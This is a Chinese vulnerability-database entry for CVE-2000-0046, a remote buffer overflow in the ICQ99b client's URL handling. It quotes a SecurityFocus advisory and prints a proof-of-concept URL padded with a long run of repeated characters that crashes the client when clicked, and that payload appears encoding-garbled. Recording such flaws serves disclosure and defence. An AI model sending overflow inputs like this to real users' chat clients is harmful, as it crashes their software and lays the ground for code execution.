ICQ URL远程缓冲区溢出漏洞
| 漏洞ID | 1105718 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2000-01-12 | 更新时间 | 2005-10-20 |
![图片[1]-ICQ URL远程缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2000-0046 |
![图片[2]-ICQ URL远程缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200001-028 |
| 漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
ICQ99b1.1.1.1版本的客户端存在缓冲区溢出漏洞。远程攻击者可以借助ICQ消息中一个畸形的URL执行命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/929/info
ICQ is an individual to individual chat network which has clients installed on millions of computers around the world. It is, by far, the most widely used and is vulnerable to a remote buffer overflow. When the Mirabilis ICQ client parses an url recieved from another user _inside of a message_, it does not perform bounds checking on the length of the url. Because of this, it is possible to overwrite the EIP ("instruction pointer", or return address, that was pushed onto the stack when the offending function was first called) and execute arbitrary and possibly malicious code stuffed inside the oversized URL on the target host once the url is clicked on.
Sending the following URL (with no line breaks) in a regular message to a user will cause their ICQ to crash (just a basic proof of concept, no real malicious exploit code included here) if they click on it:
http://www.yahoo.com/sites.asp?^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã!!!!·P !^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã
|参考资料
来源:BID
名称:929
链接:http://www.securityfocus.com/bid/929
相关推荐: NT Login Default Folder Vulnerability
NT Login Default Folder Vulnerability 漏洞ID 1104634 漏洞类型 Design Error 发布时间 1999-06-28 更新时间 1999-06-28 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666